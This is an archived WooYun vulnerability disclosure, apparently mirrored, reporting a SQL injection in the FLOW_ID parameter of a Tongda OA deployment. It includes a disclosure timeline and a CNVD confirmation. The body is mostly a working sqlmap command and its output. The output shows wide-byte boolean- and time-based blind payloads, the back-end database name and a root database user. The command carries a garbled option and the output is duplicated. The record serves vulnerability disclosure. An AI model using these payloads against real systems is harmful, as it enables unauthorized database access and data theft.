乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
# sqlmap -u "**.**.**.**:8080/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20" --dbms=mysql --tamper=between --level=5 --risk=3 00time-sec=10 --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: boolean-based blind Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses Payload: FLOW_ID=11%bf' ,(SELECT (CASE WHEN (3333=3333) THEN 1 ELSE 1/(SELECT 0) END)) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment) Payload: FLOW_ID=11%bf' AND 9973=BENCHMARK(5000000,MD5(0x6253656d))#---web server operating system: Windowsweb application technology: Apache 2.0.59, PHP 5.1.6back-end DBMS: MySQL >= 5.0.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: FLOW_ID Type: boolean-based blind Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses Payload: FLOW_ID=11%bf' ,(SELECT (CASE WHEN (3333=3333) THEN 1 ELSE 1/(SELECT 0) END)) Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment) Payload: FLOW_ID=11%bf' AND 9973=BENCHMARK(5000000,MD5(0x6253656d))#---web server operating system: Windowsweb application technology: Apache 2.0.59, PHP 5.1.6back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-11-27 16:53
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
暂无